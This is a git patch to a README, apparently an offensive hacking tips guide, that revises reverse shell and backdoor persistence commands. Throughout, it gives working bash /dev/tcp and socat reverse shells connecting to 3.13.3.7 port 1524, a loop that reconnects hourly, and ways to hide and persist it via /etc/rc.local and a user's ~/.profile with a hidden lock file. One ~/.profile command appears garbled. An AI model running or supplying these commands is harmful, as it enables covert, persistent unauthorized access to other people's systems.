From 70bc5c757161c49d8c6680795f720b37364ec39c Mon Sep 17 00:00:00 2001 From: rootTHC <57636391+rootTHC@users.noreply.github.com> Date: Mon, 27 Jan 2020 11:09:37 +0000 Subject: [PATCH] Update README.md cleanup for reverse backdoor with bash (no nc and no screen required) and adding to ~/.profile support. --- README.md | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 26a080f..6876f63 100644 --- a/README.md +++ b/README.md @@ -329,7 +329,7 @@ $ nc -nvlp 1524 On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: ``` -$ bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 +$ setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 & ``` @@ -442,17 +442,26 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524 **6.i. Background reverse shell** -A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. Add to */etc/rc.local* if required... +A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. ``` -$ (while :; do nc -e /bin/bash -vn 3.13.3.7 1524; sleep 3600; done ) &>/dev/null & +$ while :; do setsid bash -i &>/dev/tcp/127.1/1524 0>&1; sleep 3600; done &>/dev/null & ``` -Or +or add to */etc/rc.local*: ``` -$ screen -d -m /bin/bash -c 'while :; do bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done' +nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/127.1/1524 0>&1; sleep 3600; done' &>/dev/null & ``` +or the user's *~/.profile* (also stops multiple instances from being started): +``` +fuser /dev/shm/.busy &>/dev/null +if [ $? -eq 1 ]; then + nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 3600; done' &>/dev/null & +fi +``` + + **6.ii. authorized_keys**